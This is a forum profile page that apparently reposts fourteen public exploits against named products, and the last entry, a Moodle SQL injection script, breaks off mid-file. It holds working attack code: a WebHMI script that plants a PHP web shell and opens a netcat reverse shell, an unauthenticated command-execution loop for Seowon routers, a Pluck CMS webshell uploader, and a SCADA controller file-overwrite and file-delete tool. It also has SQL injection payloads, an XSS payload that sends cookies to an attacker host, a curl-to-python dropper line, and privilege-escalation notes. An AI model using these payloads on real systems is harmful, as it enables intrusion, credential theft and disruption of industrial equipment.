Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Student Record System 1.0 - 'cid' SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated) # Exploit Author: Mohd. Anees # Contact: https://www.linkedin.com/in/aneessecure/ # Software Homepage: https://phpgurukul.com/student-record-system-php/ # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 22.02.2022 ######## Description ######## # # # Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work # # http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1 Host: localhost sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt Connection: close
  2. HireHackking

    WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI 4.1.1.7662 # Tested on: WebHMI-4.1.1.7662 #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") print("Level2 account must be enabled !\n"); login = "admin" password = "admin" class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" payload = "<?php+system($_GET['c']);+?>" headers_login = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Bypassing basedir...') for i in range(0, len(payload)): #print(payload[i]) rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies) time.sleep(0.2) print('[*] Setting up listener...') listener = subprocess.Popen(["nc", "-nlp", self.localport]) time.sleep(2) print('[*] Executing payload...') time.sleep(1) print('[*] Waiting reverse shell...') r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies) if (r4.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
  3. HireHackking

    ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD # # # Vendor: Industrial Control Links, Inc. # Product web page: http://www.iclinks.com # Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf # Affected version: SW: 1.03.07 (build 317), WebLib: 1.24 # SW: 1.02.20 (build 286), WebLib: 1.24 # SW: 1.02.15 (build 286), WebLib: 1.22 # SW: 1.02.01 (build 229), WebLib: 1.16 # SW: 1.01.14 (build 172), WebLib: 1.14 # SW: 1.01.01 (build 2149), WebLib: 1.13 # # # Summary: Scadaflex II controllers are 100% web based # for both configuration and user interface. No applications # are required other than any standard web browser. They # are easily supported by remote access over the Internet # or a cellular link. Scadaflex II controllers support # industry standard wired communications using Modbus, # DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial # bridging for Modbus or any other protocol. Each Scadaflex # II controller has both analog and digital, inputs and # outputs, sufficient for pumping stations, irrigation # controls, and other similar process monitoring and control # applications. They can also serve as communications # concentrators and protocol converters that enhance the # operation of existing PLCs and process equipment. # # Desc: The SCADA controller is vulnerable to unauthenticated # file write/overwrite and delete vulnerability. This allows # an attacker to execute critical file CRUD operations on the # device that can potentially allow system access and impact # availability. # # Tested on: SCADA HTTP Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5698 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php # # CVE ID: CVE-2022-25359 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359 # # # 06.11.2021 # import time,sys import requests import datetime import showtime # Default # AES Encryption Key = 'ABCD1234abcd:ICL' def bann(): print(''' ---------------------------------------------------------- ) ) ) ) ) ) ( ( ( ( ( ( ) ) ) ) ) ) (~~~~~~~~~) (~~~~~~~~~) | t00t | | w00t | | | | | I _._ I _._ I /' `\\ I /' `\\ I | M | I | J | f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~| .' | ||~~~~~~~~| | .' | | |~~~~~~~~| | /'______|___||__###___|____|/'_______|____|_|__###___|___| ScadaFlex II SCADA Controllers Remote write/delete PoC ZSL-2022-5698 ---------------------------------------------------------- ''') def safe(*trigger, ): return True # |-| Safety Switch def choice(n): try: if n == 1: overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10)) elif n == 2: delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10)) else: print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]') print('Usage (Delete): ./sflex.py [IP] [File position number]') raise SystemExit('t00t') except Exception as tip: raise SystemExit(tip) def jump(): choice(1) if len(sys.argv) == 4 else next choice(2) if len(sys.argv) == 3 else next def overwrite(controllerip, filepos): print('Starting script at', start) localfile = sys.argv[2] with open(localfile, 'rb') as opener: scadaurl = 'http://' scadaurl += controllerip scadaurl += '/d.php?N' scadaurl += str(filepos) scadaurl += ',73,' scadaurl += opener.name scadaurl += '~' scadaurl += str(int(time.time())) see = requests.post(scadaurl, files = {'upload' : opener}) if '100' in see.text: print('File uploaded in {} directory at position {}.'.format('l', filepos)) print('URL: http://' +controllerip+ '/l/' +localfile) else: print("- controller webserver error.") exit() def delete(controllerip, filepos): print('Starting script at', start) exit(42) if isinstance(filepos, str) else next scadaurl = 'http://' scadaurl += controllerip scadaurl += '/rW12IcL_Dat_N' scadaurl += str(filepos) scadaurl += ',0=1~' scadaurl += str(int(time.time())) see = requests.get(scadaurl) check = '\x72\x57' #| check += '\x31\x32' #| check += '\x49\x63' #| check += '\x4c\x5f' #| check += '\x44\x61' #| check += '\x74\x5f' #| check += '\x4e'# o' #| check += str(filepos)#| check += '\x2c\x30' #| check += '\x09\x52' #| if check in see.text: print('File at position {} deleted.'.format(filepos)) else: print('- controller webserver error.') exit() def main(): if safe(True): print('Careful...\nSafety: ON') exit(17) else: print('Safety: OFF', end = '') global start start = datetime.datetime.now() start = start.strftime('%d.%m.%Y %H:%M:%S') bann(), jump(), choice(1959) if __name__ == "__main__": main()
  4. HireHackking

    Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated) # Date: 22.02.2022 # Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com> # Vendor Homepage: https://microweber.org/ # Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip # Version: Microweber CMS v1.2.10 # Tested on: Microweber CMS v1.2.10 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)', 'Description' => %q{ Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem. Upload function may delete the local file if the web service user has access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Talha Karakumru <talhakarakumru[at]gmail.com>' ], 'References' => [ ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/'] ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ OS_RESOURCE_LOSS ] }, 'Targets' => [ [ 'Microweber v1.2.10', {} ] ], 'Privileged' => true, 'DisclosureDate' => '2022-01-30' ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']), OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']), OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']), OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']), OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'login') }) if res.nil? fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.') end print_status 'Checking if it\'s Microweber CMS.' if res.code == 200 && !res.body.include?('Microweber') print_error 'Microweber CMS has not been detected.' Exploit::CheckCode::Safe end if res.code != 200 fail_with(Failure::Unknown, res.body) end print_good 'Microweber CMS has been detected.' return check_version(res.body) end def check_version(res_body) print_status 'Checking Microweber\'s version.' begin major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.') version = Rex::Version.new("#{major}.#{minor}.#{build}") rescue NoMethodError, TypeError return Exploit::CheckCode::Safe end if version == Rex::Version.new('1.2.10') print_good 'Microweber version ' + version.to_s return Exploit::CheckCode::Appears end print_error 'Microweber version ' + version.to_s if version < Rex::Version.new('1.2.10') print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.' return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def try_login print_status 'Trying to log in.' res = send_request_cgi({ 'method' => 'POST', 'keep_cookies' => true, 'uri' => normalize_uri(target_uri.path, 'api', 'user_login'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'lang' => '', 'where_to' => 'admin_content' } }) if res.nil? fail_with(Failure::Unreachable, 'Log in request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end json_res = res.get_json_document if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.' fail_with(Failure::BadConfig, 'Wrong username or password.') end if !json_res['success'].nil? && json_res['success'] == 'You are logged in' print_good 'You are logged in.' return end fail_with(Failure::Unknown, 'An unknown error occurred.') end def try_upload print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'), 'vars_get' => { 'src' => datastore['LOCAL_FILE_PATH'] }, 'headers' => { 'Referer' => referer } }) if res.nil? fail_with(Failure::Unreachable, 'Upload request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['success'] print_good json_res['success'] return end fail_with(Failure::Unknown, res.body) end fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.') end def try_download filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1] print_status 'Downloading ' + filename + ' from the backup folder.' referer = '' if !datastore['VHOST'].nil? && !datastore['VHOST'].empty? referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/" else referer = full_uri end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'), 'vars_get' => { 'filename' => filename }, 'headers' => { 'Referer' => referer } }) if res.nil? fail_with(Failure::Unreachable, 'Download request failed.') end if res.code != 200 fail_with(Failure::Unknown, res.body) end if res.headers['Content-Type'] == 'application/json' json_res = res.get_json_document if json_res['error'] fail_with(Failure::Unknown, json_res['error']) return end end print_status res.body end def run if datastore['DEFANGED_MODE'] warning = <<~EOF Triggering this vulnerability may delete the local file if the web service user has the permission. If you want to continue, disable the DEFANGED_MODE. => set DEFANGED_MODE false EOF fail_with(Failure::BadConfig, warning) end try_login try_upload try_download end end
  5. HireHackking

    WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 04/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662 #Steps to Reproduce 1. Login to admin account 2. Add a new register or create new dashboard insert payload <script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script> in Title field and save. # Dashboard section impact instantly all logged users. #Listener log: GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1 Host: 192.168.0.169:8080 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-GPC: 1 Referer: http://192.168.0.153/ Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
  6. HireHackking

    Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions # Discovery by: Luis Martinez # Discovery Date: 2022-02-23 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mirror_go_full8050.exe # Tested Version: 2.0.11.346 # Vulnerability Type: Local Privilege Escalation # Tested on OS: Windows 10 Pro x64 es # Step to discover Privilege Escalation: # Insecure folders permissions issue: C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe" C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F) # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable "ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it with a malicious file that will be executed with "LocalSystem" privileges.
  7. HireHackking

    Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) # Date: 2022-03-11 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30 # Version: All version # Tested on: Windows 10 Enterprise x64 , Linux # CVE : CVE-2020-17456 # [ About - Seowon SLR-120 router ]: #The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile, #The convenience of sharing wireless internet access invigorates your lifestyle, families, #friends and workmates. Carry it around to boost your active communication anywhere. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user. # [ Vulnerable products ]: #SLR-120S42G #SLR-120D42G #SLR-120T42G import requests print (''' ########################################################### # Seowon SLR-120S42G router - RCE (Unauthenticated) # # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:aryanchehreghani@yahoo.com # # -+-USE:python script.py # # Example Target : http://192.168.1.1:443/ # ########################################################### ''') url = input ("=> Enter Target : ") while(True): try: cmd = input ("~Enter Command $ ") header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "*/*", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "207", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { 'Command':'Diagnostic', 'traceMode':'ping', 'reportIpOnly':'', 'pingIpAddr':';'+cmd, 'pingPktSize':'56', 'pingTimeout':'30', 'pingCount':'4', 'maxTTLCnt':'30', 'queriesCnt':'3', 'reportIpOnlyCheckbox':'on', 'logarea':'com.cgi', 'btnApply':'Apply', 'T':'1646950471018' } x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas) print(x.text) except: break
  8. HireHackking

    WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : ilwebmaster21 # Version : WOW21_Service 5.0.1.9 # Vendor Homepage : https://wow21.life/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc WOW21_Service [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: WOW21_Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : WOW21_Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
  9. HireHackking

    Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : David Xanatos # Version : SbieSvc 5.50.2 # Vendor Homepage : https://sandboxie-plus.com/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc SbieSvc [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SbieSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe GRUPPO_ORDINE_CARICAMENTO : UIGroup TAG : 0 NOME_VISUALIZZATO : Sandboxie Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
  10. HireHackking

    Tdarr 2.00.15 - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tdarr 2.00.15 - Command Injection # Date: 10/03/2022 # Exploit Author: Sam Smith # Vendor Homepage: https://tdarr.io # Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip # Version: 2.00.15 (likely also older versions) # Tested on: 2.00.15 Exploit: The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE
  11. HireHackking

    Baixar GLPI Project 9.4.6 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Baixar GLPI Project 9.4.6 - SQLi # Date: 10/12 # Exploit Author: Joas Antonio # Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/ # Software Link: https://glpi-project.org/pt-br/baixar/ # Version: GLPI - 9.4.6 # Tested on: Windows/Linux # CVE : CVE-2021-44617 #POC1: plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111 sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
  12. HireHackking

    Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated) # Date: 13.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://github.com/pluck-cms/pluck # Version: 4.7.16 # Tested on Ubuntu 20.04.3 LTS # CVE: CVE-2022-26965 # Usage : python3 exploit.py <IP> <Port> <Password> <Pluckcmspath> # Example: python3 exploit.py 127.0.0.1 80 admin /pluck # Reference: https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC ''' Description: A theme upload functinality in Pluck CMS before 4.7.16 allows an admin privileged user to gain access in the host through the "themes files", which may result in remote code execution. ''' ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] password = sys.argv[3] pluckcmspath = sys.argv[4] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + pluckcmspath response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Authentication: ''' # Compute Content-Length: base_content_len = 27 password_encoded = urllib.parse.quote(password, safe='') password_encoded_len = len(password_encoded.encode('utf-8')) content_len = base_content_len + password_encoded_len # Construct Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': str(content_len), 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': 'http://' + target_ip + pluckcmspath + '/login.php', 'Cookie': cookie, 'Upgrade-Insecure-Requests': '1' } # Construct Data: body = { 'cont1': password, 'bogus': '', 'submit': 'Log in', } # Authenticating: link_auth = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/login.php' auth = requests.post(link_auth, headers=header, data=body) print('') if 'error' in auth.text: print('Password incorrect, please try again:') exit() else: print('Authentification was succesfull, uploading webshell') print('') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90"', 'sec-ch-ua-mobile': '?0', 'Origin': 'http://' + target_ip, 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Referer': 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.tar' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall' upload = requests.post(link_upload, headers=header1, data=data) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + pluckcmspath + '/data/themes/shell/shell.php') print('')
  13. HireHackking

    VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path # Date: 11/03/2022 # Exploit Author: Faisal Alasmari # Vendor Homepage: https://www.vive.com/ # Software Link: https://developer.vive.com/resources/downloads/ # Version: 1.0.0.4 # Tested: Windows 10 x64 C:\Users\User>sc qc "VIVE Runtime Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VIVE Runtime Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VIVE Runtime Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  14. HireHackking

    Moodle 3.11.5 - SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Moodle 3.11.5 - SQLi (Authenticated) # Date: 2/3/2022 # Exploit Author: Chris Anastasio (@mufinnnnnnn) # Vendor Homepage: https://moodle.com/ # Software Link: https://github.com/moodle/moodle/archive/refs/tags/v3.11.5.zip # Write Up: https://muffsec.com/blog/moodle-2nd-order-sqli/ # Tested on: Moodle 3.11.5+ #!/usr/bin/env python """ thanks to: - https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/ - https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap - Miroslav Stampar for maintaining this incredible tool greetz to: - @steventseeley - @fabiusartrel - @mpeg4codec - @0x90shell - @jkbenaim - jmp """ import sys import requests import re from pprint import pprint from collections import OrderedDict from lib.core.enums import PRIORITY from lib.core.data import conf from lib.core.data import kb from random import sample __priority__ = PRIORITY.NORMAL requests.packages.urllib3.disable_warnings() """ Moodle 2.7dev (Build: 